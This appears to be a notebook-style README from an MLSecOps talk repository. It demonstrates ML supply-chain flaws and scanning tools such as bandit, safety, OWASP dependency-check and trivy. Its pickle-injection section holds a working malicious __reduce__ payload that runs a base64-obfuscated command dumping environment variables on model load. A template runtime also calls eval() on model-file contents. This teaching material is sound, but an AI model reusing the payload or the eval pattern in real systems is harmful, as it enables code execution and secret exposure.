This Repo contains a set of resources relevant to the talk "Secure Machine Learning at Scale with MLSecOps", and provides a set of examples to showcase practical common security flaws throughout the multiple phases of the machine learning lifecycle.
We also present ways to mitigate and avoid these security vulnerabilities, which are grouped under the "SML Security (Safe ML Security)" repo.
Below are links to resources related to the talk, as well as references and relevant areas in machine learning security.
📄 Presentaiton Slides | 🗣️ Safe Machine Learning Project Template | 📽️ Talk Video
Below is the direct links to each of the headers that map to the main key sections of the presentation slides.
- Train Model and Deploy Artifact
- Load Pickle and Inject Malicious Code
- Adversarial Detection
- Dependency Vulnerability Scans
- Code Scans
- Container Scans
- Honourable Mentions
- Safe ML Project Template
📜 Machine Learning Ecosystem List | 📚 The State of ML Operations | 📈 Prod ML Monitoring
🌀 Accelerating ML Inference at Scale | 🕵️♀️ Alibi Detect Adversarial Detection | 👓 Practical AI Ethics
You can join the Machine Learning Engineer newsletter. You will receive updates on open source frameworks, tutorials and articles curated by machine learning professionals. |
![]() |
The notebook was created with the following requirements:
- kubectl - v1.22.5
- istioctl v1.11.4
- helm - v.3.7.0
- mc (minio client) - RELEASE.2020-04-17T08-55-48Z
- Kubernetes > 1.18
- Python 3.7
In order to set up the environment correctly, you will have to follow the SETUP.ipynb Jupyter notebook.
In this section we will train a machine learning model and deploy it with Seldon Core. We will overlook a lot of the details, but if you want to learn the ins-and-outs there are a set of talks referenced in the intro section above.
%%writefile requirements.txt
scikit-learn == 0.24.2
numpy >= 1.8.2
joblib == 0.16.0
Overwriting requirements.txt
!pip install -r requirements.txt
from sklearn import datasets
iris = datasets.load_iris()
X, y = iris.data, iris.target
from sklearn.linear_model import LogisticRegression
model = LogisticRegression(solver="liblinear", multi_class='ovr')
model.fit(X, y)
LogisticRegression(multi_class='ovr', solver='liblinear')
!mkdir -p fml-artifacts/safe/
import joblib
joblib.dump(model, "fml-artifacts/safe/model.joblib")
with open("fml-artifacts/safe/model.joblib", "rb") as f: print(f.readlines())
[b'\x80\x03csklearn.linear_model._logistic\n', b'LogisticRegression\n', b'q\x00)\x81q\x01}q\x02(X\x07\x00\x00\x00penaltyq\x03X\x02\x00\x00\x00l2q\x04X\x04\x00\x00\x00dualq\x05\x89X\x03\x00\x00\x00tolq\x06G?\x1a6\xe2\xeb\x1cC-X\x01\x00\x00\x00Cq\x07G?\xf0\x00\x00\x00\x00\x00\x00X\r\x00\x00\x00fit_interceptq\x08\x88X\x11\x00\x00\x00intercept_scalingq\tK\x01X\x0c\x00\x00\x00class_weightq\n', b'NX\x0c\x00\x00\x00random_stateq\x0bNX\x06\x00\x00\x00solverq\x0cX\t\x00\x00\x00liblinearq\rX\x08\x00\x00\x00max_iterq\x0eKdX\x0b\x00\x00\x00multi_classq\x0fX\x03\x00\x00\x00ovrq\x10X\x07\x00\x00\x00verboseq\x11K\x00X\n', b'\x00\x00\x00warm_startq\x12\x89X\x06\x00\x00\x00n_jobsq\x13NX\x08\x00\x00\x00l1_ratioq\x14NX\x0e\x00\x00\x00n_features_in_q\x15K\x04X\x08\x00\x00\x00classes_q\x16cjoblib.numpy_pickle\n', b'NumpyArrayWrapper\n', b'q\x17)\x81q\x18}q\x19(X\x08\x00\x00\x00subclassq\x1acnumpy\n', b'ndarray\n', b'q\x1bX\x05\x00\x00\x00shapeq\x1cK\x03\x85q\x1dX\x05\x00\x00\x00orderq\x1eh\x07X\x05\x00\x00\x00dtypeq\x1fcnumpy\n', b'dtype\n', b'q X\x02\x00\x00\x00i8q!\x89\x88\x87q"Rq#(K\x03X\x01\x00\x00\x00<q$NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK\x00tq%bX\n', b'\x00\x00\x00allow_mmapq&\x88ub\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00X\x05\x00\x00\x00coef_q\'h\x17)\x81q(}q)(h\x1ah\x1bh\x1cK\x03K\x04\x86q*h\x1eX\x01\x00\x00\x00Fq+h\x1fh X\x02\x00\x00\x00f8q,\x89\x88\x87q-Rq.(K\x03h$NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK\x00tq/bh&\x88ub, ?T\xff@\xda?\xf6_5nM\\\xdb?.z\xa2\x86\xfbQ\xfb\xbf\x0bh|N5m\xf7?w\xfa$3:\xcb\xf9\xbf\xbc\x99m\xbff\x8c\xf8\xbf{\xc8\x01\x01\x8c\x14\x02\xc0l\xcb\xc4e\x18m\xe2?\xb3s\x82\xa2\x8a\xc4\x03@`\xf08\xe4(V\xf0\xbf"\\}\x85\xaf\x7f\xf6\xbf\x03M#\n', b'fq\x04@X\n', b"\x00\x00\x00intercept_q0h\x17)\x81q1}q2(h\x1ah\x1bh\x1cK\x03\x85q3h\x1eh\x07h\x1fh.h&\x88ub\xb5~?\xd6\xf4\xe8\xd0?\x8d\xd5\xfc'\xb7\x80\xf1??\xc3\xdc\xe0ro\xf3\xbfX\x07\x00\x00\x00n_iter_q4h\x17)\x81q5}q6(h\x1ah\x1bh\x1cK\x01\x85q7h\x1eh\x07h\x1fh X\x02\x00\x00\x00i4q8\x89\x88\x87q9Rq:(K\x03h$NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK\x00tq;bh&\x88ub\x07\x00\x00\x00X\x10\x00\x00\x00_sklearn_versionq<X\x06\x00\x00\x000.24.2q=ub."]
!mc cp -r fml-artifacts/ minio-seldon/fml-artifacts/
...el.joblib: 1.05 KiB / 1.05 KiB ┃▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓┃ 75.93 KiB/s 0s�[0m�[0m
kubectl apply -f - << END
apiVersion: machinelearning.seldon.io/v1
kind: SeldonDeployment
name: model-safe
- graph:
implementation: SKLEARN_SERVER
modelUri: s3://fml-artifacts/safe
envSecretRefName: seldon-init-container-secret
name: classifier
name: default
seldondeployment.machinelearning.seldon.io/model-safe unchanged
!kubectl get pods | grep model-safe
model-safe-default-0-classifier-68f495d845-l9ff9 2/2 Running 0 41m
import requests
url = "http://localhost:80/seldon/default/model-safe/api/v1.0/predictions"
requests.post(url, json={"data": {"ndarray": [[1,2,3,4]]}}).json()
{'data': {'names': ['t:0', 't:1', 't:2'],
'ndarray': [[0.0006985194531162835,
'meta': {'requestPath': {'classifier': 'seldonio/sklearnserver:1.13.1'}}}
import joblib
model_safe = joblib.load("fml-artifacts/safe/model.joblib")
import types, os, base64
def __reduce__(self):
# This is basically base64 for cmd = "env > pwnd.txt"
cmd = base64.b64decode("ZW52ID4gcHduZC50eHQ=").decode()
return os.system, (cmd,)
model_safe.__class__.__reduce__ = types.MethodType(__reduce__, model_safe.__class__)
!mkdir -p fml-artifacts/unsafe/
joblib.dump(model_safe, "fml-artifacts/unsafe/model.joblib")
with open("fml-artifacts/unsafe/model.joblib", "rb") as f: print(f.readlines())
[b'\x80\x03cposix\n', b'system\n', b'q\x00X\x0e\x00\x00\x00env > pwnd.txtq\x01\x85q\x02Rq\x03.']
!mc cp -r fml-artifacts/ minio-seldon/fml-artifacts/
...el.joblib: 1.05 KiB / 1.05 KiB ┃▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓┃ 111.11 KiB/s 0s�[0m�[0m
kubectl apply -f - << END
apiVersion: machinelearning.seldon.io/v1
kind: SeldonDeployment
name: model-unsafe
- graph:
implementation: SKLEARN_SERVER
modelUri: s3://fml-artifacts/unsafe
envSecretRefName: seldon-init-container-secret
name: classifier
name: default
seldondeployment.machinelearning.seldon.io/model-unsafe unchanged
!kubectl get pods
model-safe-default-0-classifier-68f495d845-l9ff9 2/2 Running 0 43m
model-unsafe-default-0-classifier-85969ff86c-kd62w 2/2 Running 0 43m
UNSAFE_POD=$(kubectl get pod -l app=model-unsafe-default-0-classifier -o jsonpath="{.items[0].metadata.name}")
kubectl exec $UNSAFE_POD -c classifier -- head -5 pwnd.txt
!rm pwnd.txt
import joblib
model_unsafe = joblib.load("fml-artifacts/unsafe/model.joblib")
!head -4 pwnd.txt
!rm pwnd.txt
!kubectl delete sdep model-safe model-unsafe
seldondeployment.machinelearning.seldon.io "model-safe" deleted
seldondeployment.machinelearning.seldon.io "model-unsafe" deleted
Using Alibi Detect end to end adversarial detection example https://docs.seldon.io/projects/alibi-detect/en/latest/examples/alibi_detect_deploy.html
We use bandit
for python AST code scans, which we can make sure to extend as well to some of the code that is being used in Jupyter notebooks where relevant.
Examples of key areas that we would be interested to identify:
- Ensuring secrets/keys are not being committed to the repo
- Ensuring bad practice can be avoided where clear potential risk
- Identifying and pointing potentially risky code paths
- Providing suggestions where best practices can be provided
!pip install bandit
!bandit .
[main] INFO profile include tests: None
[main] INFO profile exclude tests: None
[main] INFO cli include tests: None
[main] INFO cli exclude tests: None
[main] INFO running on Python 3.7.12
[manager] WARNING Skipping directory (.), use -r flag to scan contents
�[95mRun started:2022-04-10 17:04:48.838869�[0m
Test results:�[0m
No issues identified.
Code scanned:�[0m
Total lines of code: 0
Total lines skipped (#nosec): 0
Run metrics:�[0m
Total issues (by severity):
Undefined: 0
Low: 0
Medium: 0
High: 0
Total issues (by confidence):
Undefined: 0
Low: 0
Medium: 0
High: 0
�[95mFiles skipped (0):�[0m
!cat requirements.txt
scikit-learn == 0.24.2
numpy >= 1.8.2
joblib == 0.16.0
!pip install pipdeptree
If we visualise the output of sklearn itself, we can see that for the dependencies we have a set of ranges as follows:
- joblib [required: >=0.11, installed: 0.16.0]
- numpy [required: >=1.13.3, installed: 1.21.5]
- scipy [required: >=0.19.1, installed: 1.7.3]
- numpy [required: >=1.16.5,<1.23.0, installed: 1.21.5]
- threadpoolctl [required: >=2.0.0, installed: 3.1.0]
This means that if we run an install, we may have 2nd+ level dependencies that may change causing undesired effects.
We can actually create our makeshift environment freeze by using PIP directly.
!pip freeze > requirements-freeze.txt
!head -10 requirements-freeze.txt
A better solution is to use poetry to lock the dependencies required into a .lock file that saves a fully reproducible environment.
%%writefile pyproject.toml
name = "fml-security"
version = "0.1.0"
description = ""
authors = ["Alejandro Saucedo <[email protected]>"]
python = ">=3.7,<3.11"
seldon-core = "1.13.1"
scikit-learn = "0.24.2"
numpy = "1.21.5"
joblib = "0.16.0"
pytest = "^5.2"
requires = ["poetry-core>=1.0.0"]
build-backend = "poetry.core.masonry.api"
Overwriting pyproject.toml
!poetry install
!head -20 poetry.lock
name = "atomicwrites"
version = "1.4.0"
description = "Atomic file writes."
category = "dev"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
name = "attrs"
version = "21.4.0"
description = "Classes Without Boilerplate"
category = "main"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
dev = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface", "furo", "sphinx", "sphinx-notfound-page", "pre-commit", "cloudpickle"]
docs = ["furo", "sphinx", "zope.interface", "sphinx-notfound-page"]
tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface", "cloudpickle"]
!pip install safety
!safety check -r requirements-freeze.txt
| checked 60 packages, using free DB (updated once a month) |
| package | installed | affected | ID |
| numpy | 1.21.5 | <1.22.0 | 44717 |
| numpy | 1.21.5 | <1.22.0 | 44716 |
| numpy | 1.21.5 | <1.22.2 | 44715 |
Ensuring dependencies are up to date continuously is important. There are older dependencies like piprot
but also good tools like dependeabot
!pip install piprot
!piprot requirements-freeze.txt
Your requirements are 11798 days out of date
mkdir -p owasp/deps owasp/data/cache owasp/report
docker run --rm \
-e user=$USER \
-u $(id -u ${USER}):$(id -g ${USER}) \
--volume $(pwd):/src:z \
--volume $(pwd)/owasp/data:/usr/share/dependency-check/data:z \
--volume $(pwd)/owasp/report:/report:z \
owasp/dependency-check:latest \
--scan /src \
--format "ALL" \
--project "dependency-check scan: $(pwd)" \
--out /report
!cat owasp/report/dependency-check-report.csv
"Project","ScanDate","DependencyName","DependencyPath","Description","License","Md5","Sha1","Identifiers","CPE","CVE","CWE","Vulnerability","Source","CVSSv2_Severity","CVSSv2_Score","CVSSv2","CVSSv3_BaseSeverity","CVSSv3_BaseScore","CVSSv3","CPE Confidence","Evidence Count"
!trivy image --severity CRITICAL seldonio/sklearnserver:1.14.0-dev
2022-04-11T19:29:06.350+0100 �[34mINFO�[0m Detected OS: redhat
2022-04-11T19:29:06.350+0100 �[34mINFO�[0m Detecting RHEL/CentOS vulnerabilities...
2022-04-11T19:29:06.404+0100 �[34mINFO�[0m Number of language-specific files: 1
2022-04-11T19:29:06.404+0100 �[34mINFO�[0m Detecting python-pkg vulnerabilities...
seldonio/sklearnserver:1.14.0-dev (redhat 8.5)
Total: 0 (CRITICAL: 0)
Python (python-pkg)
Total: 0 (CRITICAL: 0)
Above are a set of honorable mentions that are not covered in this notebook, but that would still be relevant to check out. You can follow the resources at the top for other links to relevant areas for deeper dives.
%%writefile sml-security.yml
project_name: "Example Project"
Writing sml-security.yml
!cookiecutter https://github.com/EthicalML/sml-security --no-input --config-file sml-security.yml
!tree example_project/
├── Dockerfile
├── Makefile
├── README.md
├── �[01;34mdocs�[00m
│ ├── Makefile
│ ├── commands.rst
│ ├── conf.py
│ ├── �[01;34mexamples�[00m
│ │ └── model-settings.json
│ ├── getting-started.rst
│ ├── index.rst
│ └── make.bat
├── �[01;34mexample_project�[00m
│ ├── __init__.py
│ ├── common.py
│ ├── runtime.py
│ └── version.py
├── pyproject.toml
├── requirements-dev.txt
├── setup.py
└── �[01;34mtests�[00m
├── conftest.py
└── test_runtime.py
4 directories, 20 files
!cat example_project/pyproject.toml
name = "Example Project"
version = "0.1.0"
description = "A short description of the project."
authors = ["MyGithubUsername"]
license = "MIT"
python = "^3.8"
mlserver = "1.1.0.dev6"
fastapi = "^0.78"
Sphinx = "3.2.1"
coverage = "4.5.4"
flake8 = "3.9.0"
safety = "1.10.3"
piprot = "0.9.11"
bandit = "1.7.4"
requires = ["poetry-core>=1.0.0"]
build-backend = "poetry.core.masonry.api"
!cat example_project/example_project/runtime.py
import numpy as np
from mlserver.model import MLModel
from mlserver.settings import ModelSettings
from fastapi import status
from mlserver.utils import get_model_uri
from mlserver.errors import InvalidModelURI, MLServerError
from mlserver.types import (
from mlserver.codecs import NumpyCodec, NumpyRequestCodec
from example_project.common import ExampleProjectSettings
class ExampleProject(MLModel):
"""Runtime class for specific Huggingface models"""
def __init__(self, settings: ModelSettings):
self._extra_settings = ExampleProjectSettings(**settings.parameters.extra) # type: ignore
async def load(self) -> bool:
# Simple showcase reading a lambda as string either from file or
model_uri = await get_model_uri(self._settings)
with open(model_uri, "r") as f:
self._model = eval(f.read())
except (InvalidModelURI, IsADirectoryError):
self._model = eval(self._extra_settings.lambda_value)
if not callable(self._model):
raise MLServerError("Invalid lambda value provided", status.HTTP_500_INTERNAL_SERVER_ERROR)
self.ready = True
return self.ready
async def predict(self, payload: InferenceRequest) -> InferenceResponse:
Prediction request
# For more advanced request decoding see MLServer codecs documentation
model_input = NumpyRequestCodec.decode(payload)
model_output = self._model(model_input)
model_output_np = np.array(model_output)
encoded_output = NumpyCodec.encode("predict", model_output_np)
return InferenceResponse(
!make -C example_project/ local-run
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
mlserver start docs/examples/. &
make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'
!make -C example_project/ local-test-request
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
curl http://localhost:8080/v2/models/test-model/infer \
-H "Content-Type: application/json" \
-d '{"inputs":[{"name":"test_input","shape":[3],"datatype":"INT32","data":[1,2,3]}]}'
{"model_name":"test-model","model_version":null,"id":"894a189e-cce3-4329-aa71-495d5b61621e","parameters":null,"outputs":[{"name":"predict","shape":[],"datatype":"INT64","parameters":null,"data":[6]}]}make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'
!curl http://localhost:8080/v2/models/test-model/infer \
-H "Content-Type: application/json" \
-d '{"inputs":[{"name":"test_input","shape":[3],"datatype":"INT32","data":[1,2,3]}]}'
!make -C example_project/ security-local-code
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
bandit .
[main] INFO profile include tests: None
[main] INFO profile exclude tests: None
[main] INFO cli include tests: None
[main] INFO cli exclude tests: None
[main] INFO running on Python 3.7.10
[manager] WARNING Skipping directory (.), use -r flag to scan contents
�[95mRun started:2022-06-04 08:24:43.129814�[0m
Test results:�[0m
No issues identified.
Code scanned:�[0m
Total lines of code: 0
Total lines skipped (#nosec): 0
Run metrics:�[0m
Total issues (by severity):
Undefined: 0
Low: 0
Medium: 0
High: 0
Total issues (by confidence):
Undefined: 0
Low: 0
Medium: 0
High: 0
�[95mFiles skipped (0):�[0m
make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'
!make -C example_project/ security-local-dependencies
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
poetry export --without-hashes -f requirements.txt | safety check --full-report --stdin
�[33mWarning: unpinned requirement 'NoCompatiblePythonVersionFound' found in <stdin>, unable to check.�[0m
| checked 0 packages, using free DB (updated once a month) |
| No known security vulnerabilities found. |
make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'
!make -C example_project/ security-local-dependencies-old
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
poetry export --without-hashes -f requirements.txt | piprot --latest --outdated -
Looks like you've been keeping up to date, time for a delicious beverage!
make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'